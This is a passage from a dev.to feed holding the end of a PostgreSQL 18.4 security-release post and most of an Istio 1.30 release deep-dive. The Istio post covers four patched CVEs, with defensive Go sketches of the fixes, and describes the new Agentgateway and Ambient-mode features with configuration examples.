&lt;h2&gt;
  
  
  9. Closing — The New Defaults 18.4 Sets
&lt;/h2&gt;

&lt;p&gt;PostgreSQL 18.4 is a release where &lt;strong&gt;urgent security fixes and 18's new authentication, identifier, and temporal features arrive together on a stable minor version&lt;/strong&gt;. Among the 11 CVEs, the &lt;code&gt;refint&lt;/code&gt; RCE (&lt;code&gt;CVE-2026-6637&lt;/code&gt;), the SSL/GSS DoS (&lt;code&gt;CVE-2026-6479&lt;/code&gt;), and the logical-replication SQL injection (&lt;code&gt;CVE-2026-6476&lt;/code&gt;) demand patching &lt;em&gt;now&lt;/em&gt;. The 18 major-release features (&lt;code&gt;io_method=worker&lt;/code&gt; by default with &lt;code&gt;io_uring&lt;/code&gt; available on Linux 5.1+, native OAuth 2.0, &lt;code&gt;uuidv7()&lt;/code&gt;, Virtual Generated Columns, and Temporal Constraints) are now the starting point for &lt;em&gt;new schemas designed in H2 2026&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;ManoIT's recommended operational sequence: (1) apply the security patches across every supported track (14.23, 15.18, 16.14, 17.10, 18.4) within seven days; (2) audit and remove the three risk patterns — &lt;code&gt;refint&lt;/code&gt;, MD5 authentication, unrestricted SSL/GSS exposure; (3) keep &lt;code&gt;io_method=worker&lt;/code&gt; as a baseline and switch to &lt;code&gt;io_uring&lt;/code&gt; on Linux 5.1+ workloads; (4) design new services starting with OAuth 2.0 authentication + &lt;code&gt;uuidv7()&lt;/code&gt; + Virtual Generated Columns; (5) introduce &lt;code&gt;WITHOUT OVERLAPS&lt;/code&gt; and &lt;code&gt;PERIOD&lt;/code&gt; for reservation, contract, and history tables where the time dimension matters. The database is no longer "an engine that runs SQL" — it's now an &lt;strong&gt;enterprise security control point that standardizes authentication, identification, the time dimension, and the I/O model together&lt;/strong&gt;.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This post was co-authored by Anthropic Claude (Opus 4.6) and the ManoIT engineering team. PostgreSQL 18.4 release notes and security advisories from postgresql.org are primary sources. ManoIT internal verification results are provided as reference and should not be generalized. Please credit the source when citing or republishing.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1476091" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>postgres</category>
      <category>database</category>
      <category>security</category>
      <category>backend</category>
    </item>
    <item>
      <title>Istio 1.30 Deep Dive — Agentgateway, Ambient Multicluster, TrafficExtension API, and 4 CVE Patches (JWKS RSA Leak, XDS Debug Auth)</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Thu, 21 May 2026 00:21:58 +0000</pubDate>
      <link>https://dev.to/x4nent/istio-130-deep-dive-agentgateway-ambient-multicluster-trafficextension-api-and-4-cve-patches-431d</link>
      <guid>https://dev.to/x4nent/istio-130-deep-dive-agentgateway-ambient-multicluster-trafficextension-api-and-4-cve-patches-431d</guid>
      <description>&lt;h1&gt;
  
  
  Istio 1.30 Deep Dive — Agentgateway, Ambient Multicluster, TrafficExtension API, and 4 CVE Patches (JWKS RSA Leak, XDS Debug Auth)
&lt;/h1&gt;

&lt;p&gt;On May 18, 2026, the Istio community shipped &lt;strong&gt;Istio 1.30.0&lt;/strong&gt; alongside backports 1.29.3 and 1.28.7. On the surface it's a regular quarterly release, but the content is roughly double the normal scope. First, &lt;strong&gt;Agentgateway&lt;/strong&gt; — a new Gateway API data-plane proxy built for AI agent and MCP server traffic — is wired in as an experimental &lt;code&gt;GatewayClass&lt;/code&gt;, replacing Envoy on the gateway pod when enabled. Second, &lt;strong&gt;Ambient mode&lt;/strong&gt; finally crosses an operability threshold with CIDR &lt;code&gt;ServiceEntry&lt;/code&gt;, optional XFCC synthesis at waypoints, configurable HBONE window sizing, and Tokio runtime metrics in ztunnel. Third, the new &lt;strong&gt;&lt;code&gt;TrafficExtension&lt;/code&gt; API&lt;/strong&gt; lands as a unified replacement for &lt;code&gt;WasmPlugin&lt;/code&gt;, consolidating Wasm and Lua extensibility behind a single resource that applies to sidecars, gateways, and waypoints. And decisively — &lt;strong&gt;four security advisories are patched together&lt;/strong&gt;: &lt;code&gt;CVE-2026-31837&lt;/code&gt; (JWKS fallback leaks an RSA private key, enabling JWT forgery), &lt;code&gt;CVE-2026-31838&lt;/code&gt; (XDS debug endpoints on plaintext port 15010 reachable without authentication), &lt;code&gt;CVE-2026-39350&lt;/code&gt; (regex metacharacters in &lt;code&gt;AuthorizationPolicy&lt;/code&gt; SPIFFE/namespace fields are not escaped), and &lt;code&gt;CVE-2026-41413&lt;/code&gt; (JWKS URI CIDR blocking is bypassed via DNS redirects and issuer discovery). 
This article decomposes the 1.29 → 1.30 breaking changes — XDS debug auth becoming mandatory, CNI config permissions tightening to 0600, and the sidecar service-namespace selection order flipping from alphabetical to "Kubernetes Service first" — across the five components that matter (ztunnel, waypoint, CNI, istiod, istioctl), and walks through the upgrade checklist we ran on a lab cluster (EKS 1.33 + Ambient + multi-network).&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why May 18, 2026 is a turning point for service mesh
&lt;/h2&gt;

&lt;p&gt;Istio promoted Ambient mode to beta in 1.22 and to GA in 1.24 (both in 2024), and Ambient Multicluster reached alpha in late 2025. At KubeCon EU 2026, CNCF framed Istio as a "future-ready service mesh for the AI era"; the three flagship items from that announcement (&lt;code&gt;InferencePool&lt;/code&gt; v1, Ambient multi-network waypoint routing, the Agentgateway data plane) are all available in 1.30, either as GA or as experimental features. 1.30 matters because three independent tracks arrive at the same time.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Release / Event&lt;/th&gt;
&lt;th&gt;Operational impact&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2025.11.05&lt;/td&gt;
&lt;td&gt;Istio 1.28.0 — Ambient Multicluster alpha, nftables, &lt;code&gt;InferencePool&lt;/code&gt; v1&lt;/td&gt;
&lt;td&gt;Multi-network waypoint routing introduced&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.02&lt;/td&gt;
&lt;td&gt;Istio 1.29.0 — TrafficExtension API early scaffolding&lt;/td&gt;
&lt;td&gt;WasmPlugin replacement work begins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.03.25&lt;/td&gt;
&lt;td&gt;CNCF "Future-Ready Service Mesh" announcement (KubeCon EU)&lt;/td&gt;
&lt;td&gt;Ambient Multicluster + Inference Extension + Agentgateway roadmap&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.04&lt;/td&gt;
&lt;td&gt;Cilium Tetragon 1.4 + Cilium 1.18 stabilizing&lt;/td&gt;
&lt;td&gt;Competing eBPF runtime security options mature&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2026.05.18&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Istio 1.30.0 + 1.29.3 + 1.28.7 released simultaneously&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;4 CVE patches + Agentgateway experimental + TrafficExtension API + Helm v4 SSA&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.18&lt;/td&gt;
&lt;td&gt;Supported Kubernetes range moves to 1.32 – 1.36&lt;/td&gt;
&lt;td&gt;Clusters still on Kubernetes 1.31 should stay on Istio 1.29 until the cluster is upgraded&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;H2 2026 (planned)&lt;/td&gt;
&lt;td&gt;Ambient Multicluster GA + Agentgateway beta&lt;/td&gt;
&lt;td&gt;Stabilization candidate for 1.31; sidecar mode increasingly maintenance-only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The two practical takeaways: 1.30 is a &lt;strong&gt;security-driven release&lt;/strong&gt; rather than a routine feature drop, and the breaking changes in the upgrade notes touch things teams habitually leave on autopilot (debug endpoints, CNI config, sidecar service selection).&lt;/p&gt;

&lt;h2&gt;
  
  
  2. The four CVEs patched together — what attack surface closed
&lt;/h2&gt;

&lt;p&gt;This is the security-driven center of gravity for the release. The same four advisories also land in 1.28.7 and 1.29.3, so everyone on a supported track is in scope right now.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;One-line summary&lt;/th&gt;
&lt;th&gt;Patch behavior&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-31837&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Critical&lt;/td&gt;
&lt;td&gt;istiod · RequestAuthentication&lt;/td&gt;
&lt;td&gt;JWKS fallback leaks RSA private key → attacker forges JWTs&lt;/td&gt;
&lt;td&gt;JWKS fallback strictly serializes public-key fields only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-31838&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;istiod · port 15010 XDS&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;syncz&lt;/code&gt; / &lt;code&gt;config_dump&lt;/code&gt; reachable on plaintext XDS without auth&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;ENABLE_DEBUG_ENDPOINT_AUTH=true&lt;/code&gt; default; XDS goes through the same gate as HTTP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-39350&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;istiod · AuthorizationPolicy&lt;/td&gt;
&lt;td&gt;Regex metacharacters in &lt;code&gt;source.principals&lt;/code&gt; / &lt;code&gt;source.namespaces&lt;/code&gt; not escaped&lt;/td&gt;
&lt;td&gt;Auto-quote SPIFFE identifiers and namespace names before regex conversion&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-41413&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;istiod · JWKS URI blocking&lt;/td&gt;
&lt;td&gt;CIDR block bypassed via HTTP redirects / issuer discovery&lt;/td&gt;
&lt;td&gt;Custom &lt;code&gt;DialContext.Control&lt;/code&gt; filters after DNS resolution, before dialing&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  2.1 CVE-2026-31837 — RSA private key leaks via JWKS fallback
&lt;/h3&gt;

&lt;p&gt;The worst of the four. &lt;code&gt;RequestAuthentication&lt;/code&gt; fetches JWKS from &lt;code&gt;jwksUri&lt;/code&gt;; if that fetch fails, istiod falls back to a cached key set. The fallback serializer accidentally included RSA &lt;em&gt;private&lt;/em&gt; components (&lt;code&gt;d&lt;/code&gt;, &lt;code&gt;p&lt;/code&gt;, &lt;code&gt;q&lt;/code&gt;, …) when emitting the key set into downstream Envoy JWT-filter config. Since Envoy config flows over the XDS channel, any sufficiently privileged in-mesh workload that could dump that config effectively held the JWT issuer's signing key. Outcome: &lt;strong&gt;attackers forge arbitrary claims → bypass &lt;code&gt;AuthorizationPolicy&lt;/code&gt; → reach protected workloads&lt;/strong&gt;. The 1.30 patch whitelists public-key fields only (&lt;code&gt;n&lt;/code&gt;, &lt;code&gt;e&lt;/code&gt;, &lt;code&gt;kid&lt;/code&gt;, &lt;code&gt;kty&lt;/code&gt;, &lt;code&gt;use&lt;/code&gt;). Credit to &lt;code&gt;1seal&lt;/code&gt;.&lt;/p&gt;
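&lt;p&gt;To make the fix concrete, here is a minimal Go sketch of the allowlist approach (Go being the language istiod is written in). It emits only the public JWK members listed above from an RSA key, and the private members simply have no field to land in. The &lt;code&gt;publicJWK&lt;/code&gt; type, the &lt;code&gt;toPublicJWK&lt;/code&gt; helper, and the &lt;code&gt;kid&lt;/code&gt; value are hypothetical; this illustrates the technique, not istiod's actual serializer.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;package main

import (
	"crypto/rand"
	"crypto/rsa"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"math/big"
)

// publicJWK lists only the public members of an RSA JWK (RFC 7517 / RFC 7518).
// Private members (d, p, q, dp, dq, qi) have no field here, so they cannot be
// serialized by accident.
type publicJWK struct {
	Kty string `json:"kty"`
	Use string `json:"use"`
	Kid string `json:"kid"`
	N   string `json:"n"`
	E   string `json:"e"`
}

// toPublicJWK copies the modulus and exponent out of an RSA public key.
// Accepting *rsa.PublicKey instead of *rsa.PrivateKey keeps private
// material out of reach at the type level.
func toPublicJWK(pub *rsa.PublicKey, kid string) publicJWK {
	b64 := base64.RawURLEncoding
	return publicJWK{
		Kty: "RSA",
		Use: "sig",
		Kid: kid,
		N:   b64.EncodeToString(pub.N.Bytes()),
		E:   b64.EncodeToString(big.NewInt(int64(pub.E)).Bytes()),
	}
}

func main() {
	key, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	// Only the public half is passed on; key.D and key.Primes are never read.
	out, err := json.Marshal(toPublicJWK(key.Public().(*rsa.PublicKey), "demo-key-1"))
	if err != nil {
		panic(err)
	}
	fmt.Println(string(out))
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Taking &lt;code&gt;*rsa.PublicKey&lt;/code&gt; rather than the private key is the design point: the compiler, not a code review, guarantees that &lt;code&gt;D&lt;/code&gt; and the primes never reach the serializer.&lt;/p&gt;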

&lt;h3&gt;
  
  
  2.2 CVE-2026-31838 — XDS debug endpoints reachable without authentication
&lt;/h3&gt;

&lt;p&gt;istiod's HTTP debug endpoints were already gated, but the &lt;strong&gt;XDS-channel debug RPCs&lt;/strong&gt; (&lt;code&gt;syncz&lt;/code&gt;, &lt;code&gt;config_dump&lt;/code&gt;) served on plaintext XDS port 15010 went through a different code path with no authentication. Plaintext XDS exists for narrow bootstrap scenarios in which mTLS credentials are not yet available, but a missing or misconfigured NetworkPolicy could expose the port to neighboring workloads. From 1.30, &lt;code&gt;ENABLE_DEBUG_ENDPOINT_AUTH=true&lt;/code&gt; is the default and applies to both the HTTP and XDS debug paths. Operators who need to authorize callers beyond the system namespace can list extra namespaces in &lt;code&gt;DEBUG_ENDPOINT_AUTH_ALLOWED_NAMESPACES&lt;/code&gt;.&lt;/p&gt;
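&lt;p&gt;The gate itself can be modeled in a few lines. The Go sketch below is a hypothetical model rather than istiod's code: it assumes the caller's namespace has already been derived from its authenticated identity, and it assumes &lt;code&gt;DEBUG_ENDPOINT_AUTH_ALLOWED_NAMESPACES&lt;/code&gt; holds a comma-separated list, which is a guess about the format.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;package main

import (
	"fmt"
	"strings"
)

// debugCallerAllowed is a hypothetical model of the 1.30 debug-endpoint gate,
// applied the same way to HTTP and XDS debug requests. callerNS must come from
// the caller's authenticated identity (for example the namespace segment of
// its SPIFFE ID), never from anything the caller can simply claim.
func debugCallerAllowed(authEnabled bool, callerNS, systemNS, allowedEnv string) bool {
	if !authEnabled {
		// ENABLE_DEBUG_ENDPOINT_AUTH=false: no check at all (not recommended).
		return true
	}
	if callerNS == "" {
		// Unauthenticated caller, e.g. a bare request on plaintext port 15010.
		return false
	}
	if callerNS == systemNS {
		return true
	}
	// Assumed format: comma-separated namespace names, surrounding spaces ignored.
	for _, ns := range strings.Split(allowedEnv, ",") {
		if strings.TrimSpace(ns) == callerNS {
			return true
		}
	}
	return false
}

func main() {
	allowed := "monitoring, platform-tools" // hypothetical env var value
	for _, ns := range []string{"istio-system", "monitoring", "default", ""} {
		fmt.Printf("%q allowed: %v\n", ns, debugCallerAllowed(true, ns, "istio-system", allowed))
	}
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;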

&lt;h3&gt;
  
  
  2.3 CVE-2026-39350 — AuthorizationPolicy regex escaping
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;AuthorizationPolicy&lt;/code&gt; translates &lt;code&gt;source.principals&lt;/code&gt; (SPIFFE suffix match) and &lt;code&gt;source.namespaces&lt;/code&gt; into Envoy regex configuration. SPIFFE identifiers contain characters such as &lt;code&gt;.&lt;/code&gt; that are regex metacharacters (an unescaped &lt;code&gt;.&lt;/code&gt; matches any single character), and these were not being escaped, so a rule meant to match &lt;code&gt;cluster.local/ns/team-a/sa/api&lt;/code&gt; could also match lookalikes such as &lt;code&gt;cluster_local/ns/team-a/sa/api&lt;/code&gt;. More dangerously, accidental wildcards could let same-named ServiceAccounts in &lt;em&gt;other&lt;/em&gt; namespaces satisfy the rule. 1.30 quotes identifiers automatically before regex compilation. Credit to &lt;code&gt;Alex0Young&lt;/code&gt; and &lt;code&gt;Wernerina&lt;/code&gt;.&lt;/p&gt;
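&lt;p&gt;The bug class is easy to reproduce. Envoy evaluates these matchers with Google RE2, and Go's &lt;code&gt;regexp&lt;/code&gt; package implements the same RE2 syntax, so the sketch below is a reasonable model. &lt;code&gt;suffixRegex&lt;/code&gt; is a hypothetical helper that builds an "ends with" pattern the way a policy translator might, and &lt;code&gt;regexp.QuoteMeta&lt;/code&gt; stands in for the 1.30 auto-quoting.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;package main

import (
	"fmt"
	"regexp"
)

// suffixRegex builds an "ends with" matcher for a principal, in the spirit of a
// SPIFFE suffix match. With quote=false, characters such as "." keep their
// regex meaning (the pre-1.30 bug class); with quote=true they match literally.
func suffixRegex(principal string, quote bool) *regexp.Regexp {
	if quote {
		principal = regexp.QuoteMeta(principal)
	}
	return regexp.MustCompile("^.*" + principal + "$")
}

func main() {
	rule := "cluster.local/ns/team-a/sa/api"
	legit := "spiffe://cluster.local/ns/team-a/sa/api"
	lookalike := "spiffe://cluster_local/ns/team-a/sa/api"

	unquoted := suffixRegex(rule, false)
	quoted := suffixRegex(rule, true)

	fmt.Println(unquoted.MatchString(legit), unquoted.MatchString(lookalike)) // true true
	fmt.Println(quoted.MatchString(legit), quoted.MatchString(lookalike))     // true false
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;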

&lt;h3&gt;
  
  
  2.4 CVE-2026-41413 — JWKS URI CIDR blocking bypassed
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;BLOCKED_CIDRS_IN_JWKS_URIS&lt;/code&gt; was meant to prevent istiod from fetching JWKS from private IP ranges, but it didn't apply when the URI went through an HTTP redirect or when the well-known issuer discovery endpoint pointed at a JWKS URI in a private range. 1.30 introduces a custom &lt;code&gt;DialContext.Control&lt;/code&gt; that filters connections &lt;strong&gt;after DNS resolution but before dialing&lt;/strong&gt; — preserving happy eyeballs and &lt;code&gt;dialSerial&lt;/code&gt; while enforcing the block all the way through redirect chains. &lt;code&gt;istioctl analyze&lt;/code&gt; now warns (&lt;code&gt;IST0175&lt;/code&gt;) when &lt;code&gt;RequestAuthentication&lt;/code&gt; is in use but &lt;code&gt;BLOCKED_CIDRS_IN_JWKS_URIS&lt;/code&gt; is not configured. Credit to &lt;code&gt;KoreaSecurity&lt;/code&gt;, &lt;code&gt;1seal&lt;/code&gt;, and &lt;code&gt;AKiileX&lt;/code&gt;.&lt;/p&gt;
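&lt;p&gt;The &lt;code&gt;DialContext.Control&lt;/code&gt; mentioned above most plausibly corresponds to the &lt;code&gt;Control&lt;/code&gt; hook on Go's &lt;code&gt;net.Dialer&lt;/code&gt;, which the standard library invokes with the already-resolved &lt;code&gt;ip:port&lt;/code&gt; after the socket is created and before it connects. Because the hook runs for every address the dialer attempts, Happy Eyeballs and serial fallback are unaffected, and every connection an HTTP client opens for a redirect hop or a discovery document passes the same check. The sketch below assumes that mapping; &lt;code&gt;blockingControl&lt;/code&gt;, &lt;code&gt;newJWKSClient&lt;/code&gt;, and the CIDR list are hypothetical, not istiod's implementation.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;package main

import (
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/netip"
	"syscall"
	"time"
)

var errBlockedCIDR = errors.New("destination is in a blocked CIDR")

// blockingControl returns a hook for net.Dialer.Control. The dialer calls it
// with the resolved "ip:port" after creating the socket and before connecting,
// once per address it tries.
func blockingControl(blocked []netip.Prefix) func(network, address string, c syscall.RawConn) error {
	return func(network, address string, c syscall.RawConn) error {
		ap, err := netip.ParseAddrPort(address)
		if err != nil {
			return err
		}
		ip := ap.Addr().Unmap() // treat ::ffff:10.0.0.1 the same as 10.0.0.1
		for _, p := range blocked {
			if p.Contains(ip) {
				return fmt.Errorf("%w: %s", errBlockedCIDR, ip)
			}
		}
		return nil
	}
}

// newJWKSClient returns an HTTP client whose every connection, including
// connections opened while following redirects, is checked by the hook.
func newJWKSClient(blocked []netip.Prefix) *http.Client {
	dialer := new(net.Dialer)
	dialer.Timeout = 5 * time.Second
	dialer.Control = blockingControl(blocked)

	transport := http.DefaultTransport.(*http.Transport).Clone()
	transport.Proxy = nil // dial targets directly so the hook sees the real destination
	transport.DialContext = dialer.DialContext

	client := new(http.Client)
	client.Transport = transport
	client.Timeout = 10 * time.Second
	return client
}

func main() {
	blocked := []netip.Prefix{
		netip.MustParsePrefix("10.0.0.0/8"),
		netip.MustParsePrefix("127.0.0.0/8"),
		netip.MustParsePrefix("169.254.0.0/16"),
		netip.MustParsePrefix("fd00::/8"),
	}
	client := newJWKSClient(blocked)

	// Loopback is blocked, so the request fails inside the hook before any
	// TCP handshake is attempted.
	_, err := client.Get("http://127.0.0.1:8080/.well-known/jwks.json")
	fmt.Println("blocked:", errors.Is(err, errBlockedCIDR))
	fmt.Println(err)
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Checking in the dial hook rather than on the URL is what closes the bypass: a hostname that resolves to a private address, or a redirect that points at one, only becomes visible as a concrete IP at this stage.&lt;/p&gt;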

&lt;h2&gt;
  
  
  3. Agentgateway — a new data plane for AI agent and MCP traffic
&lt;/h2&gt;

&lt;p&gt;The headline new feature. Agentgateway is a data-plane proxy designed for AI agent and MCP (Model Context Protocol) server traffic. When enabled, it &lt;strong&gt;replaces Envoy on the gateway pod&lt;/strong&gt;, but only as a Gateway API gateway — not as a sidecar or waypoint.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1) Enable feature flag on istiod&lt;/span&gt;
helm upgrade istiod istio/istiod &lt;span class="nt"&gt;-n&lt;/span&gt; istio-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--reuse-values&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; pilot.env.PILOT_ENABLE_AGENTGATEWAY&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;

&lt;span class="c"&gt;# 2) Confirm GatewayClass is registered&lt;/span&gt;
kubectl get gatewayclass istio-agentgateway &lt;span class="nt"&gt;-o&lt;/span&gt; yaml

&lt;span class="c"&gt;# 3) Use it from a Gateway resource&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: ai-agent-ingress
  namespace: ai-platform
spec:
  gatewayClassName: istio-agentgateway   # ← uses agentgateway instead of Envoy
  listeners:
  - name: mcp
    port: 8080
    protocol: HTTP
    allowedRoutes:
      namespaces:
        from: Same
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Why not Envoy — what agentgateway is optimized for
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Envoy (Istio default)&lt;/th&gt;
&lt;th&gt;Agentgateway (experimental)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Design goal&lt;/td&gt;
&lt;td&gt;General-purpose L4/L7 proxy&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Built for AI agent / MCP / LLM inference traffic&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Streaming model&lt;/td&gt;
&lt;td&gt;HTTP/2 multiplexing, gRPC streaming&lt;/td&gt;
&lt;td&gt;Long-lived SSE, MCP stdio-over-HTTP, tool-call streaming&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Token / session model&lt;/td&gt;
&lt;td&gt;JWT-based RequestAuthentication&lt;/td&gt;
&lt;td&gt;MCP session and tool-invocation context as first-class concepts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Supported modes&lt;/td&gt;
&lt;td&gt;Sidecar / Waypoint / Gateway&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Gateway only&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Config model&lt;/td&gt;
&lt;td&gt;EnvoyFilter / TelemetryAPI / WasmPlugin&lt;/td&gt;
&lt;td&gt;Gateway API + agentgateway-specific policies&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Activation&lt;/td&gt;
&lt;td&gt;Default&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PILOT_ENABLE_AGENTGATEWAY=true&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Maturity&lt;/td&gt;
&lt;td&gt;GA&lt;/td&gt;
&lt;td&gt;Experimental&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The fit at 1.30 is "isolate AI traffic onto its own gateway, leave everything else on Envoy." That matches the deployment shape many teams running an internal RAG gateway or an MCP server fleet already favor.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Ambient mode — CIDR ServiceEntry, XFCC synthesis, HBONE tuning
&lt;/h2&gt;

&lt;p&gt;For Ambient adopters, 1.30 is the biggest operability jump since the mode shipped.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 CIDR ServiceEntry — expose IP ranges to Ambient directly
&lt;/h3&gt;

&lt;p&gt;Until now, modeling an external database or legacy VM pool with many IPs in Ambient meant enumerating every IP as an endpoint. 1.30 lets you put a CIDR directly into &lt;code&gt;ServiceEntry.endpoints[].address&lt;/code&gt;, and ztunnel does longest-prefix-match routing.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;networking.istio.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceEntry&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;legacy-vm-pool&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;data-platform&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;hosts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;legacy.internal&lt;/span&gt;
  &lt;span class="na"&gt;addresses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;10.20.0.0/24&lt;/span&gt;
  &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;number&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5432&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pg&lt;/span&gt;
    &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;TCP&lt;/span&gt;
